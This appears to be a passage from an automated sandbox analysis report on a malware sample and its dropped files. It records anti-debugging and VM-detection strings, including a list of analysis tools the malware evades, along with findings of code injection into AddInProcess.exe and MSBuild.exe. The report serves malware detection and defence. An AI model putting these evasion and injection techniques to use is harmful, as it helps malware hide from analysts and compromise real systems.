                            Source: sys_updater.exe, 0000001F.00000003.2838845710.0000020E47C0E000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2843023143.0000020E47C0E000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2835803941.0000020E47C04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interru
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BC3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5ABF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F3592000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F3579000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E494F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service:|b ,
                            Source: sys_updater.exe, 0000001F.00000003.2838586237.0000020E47B64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
                            Source: sys_updater.exe, 0000001F.00000003.2812365252.0000020E47A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number48
                            Source: sys_updater.exe, 00000022.00000003.2924737972.00000237D32AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2923888088.00000237D32AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2924061808.00000237D32AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2925669194.00000237D3292000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2924910130.00000237D32AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Reques
                            Source: sys_updater.exe, 0000001F.00000003.2895586429.0000020E494BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                            Source: sys_updater.exe, 0000001F.00000003.2895586429.0000020E494BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2152912193.00000234D413D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervis
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2152912193.00000234D413D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
                            Source: sys_updater.exe.26.drBinary or memory string: VGAuthService.exe.exehollows_hunter32procexp64.exeprocexp.exeProcmon.exeProcmon64.exepestudio.exeKsDumper.exeprl_cc.exeprl_tools.exepe-sieve64.exeMoneta64.exefakenet.exeWireshark.exeVBoxService.exeVMwareUser.exevmtoolsd.exeVMwareTray.exevmsrvc.exeVBoxTray.exeC:\Users\Hassp\.cargo\registry\src\index.crates.io-6f17d22bba15001f\antilysis-0.1.2\src\lib.rs>
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partition:C\
                            Source: sys_updater.exe, 0000001B.00000003.2716504678.00000159F3435000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2721618394.00000159F3435000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 0
                            Source: sys_updater.exe, 0000001B.00000003.2711441685.00000159F342B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2713187842.00000159F3435000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2713513597.00000159F3435000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec48
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceI
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2154673474.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2153449987.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2154400001.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2154147432.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2153766805.00000234D59EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes+
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Servicel.P
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipesui
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess queried: DebugPort
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F1434 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005F1434
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F6600 mov eax, dword ptr fs:[00000030h]0_2_005F6600
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005FFF7D mov eax, dword ptr fs:[00000030h]0_2_005FFF7D
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005FFF39 mov eax, dword ptr fs:[00000030h]0_2_005FFF39
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_00556600 mov eax, dword ptr fs:[00000030h]3_2_00556600
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_0055FF7D mov eax, dword ptr fs:[00000030h]3_2_0055FF7D
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_0055FF39 mov eax, dword ptr fs:[00000030h]3_2_0055FF39
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_00608004 GetProcessHeap,0_2_00608004
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F1434 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005F1434
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F4C93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005F4C93
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F1597 SetUnhandledExceptionFilter,0_2_005F1597
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F16B1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005F16B1
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_00551434 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00551434
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_00554C93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00554C93
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_00551597 SetUnhandledExceptionFilter,3_2_00551597
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_005516B1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_005516B1
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C78C45A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6C78C45A
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C7884BA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6C7884BA
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C787FE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6C787FE1
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            .NET source code references suspicious native API functions
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.f363d4.1.raw.unpack, NativeLibrary.csReference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.146ecf4.5.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                            Allocates memory in foreign processes
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                            Contains functionality to inject code into remote processes
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005D4780 CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,VirtualAllocEx,GetLastError,VirtualAllocEx,WriteProcessMemory,SetThreadContext,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,ResumeThread,0_2_005D4780
                            Injects a PE file into a foreign processes
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5AJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5AJump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                            Modifies the context of a thread in another process (thread injection)
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread register set: target process: 6560Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeThread register set: target process: 2704Jump to behavior
                            Writes to foreign memory regions
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: DF88456010Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000Jump to behavior
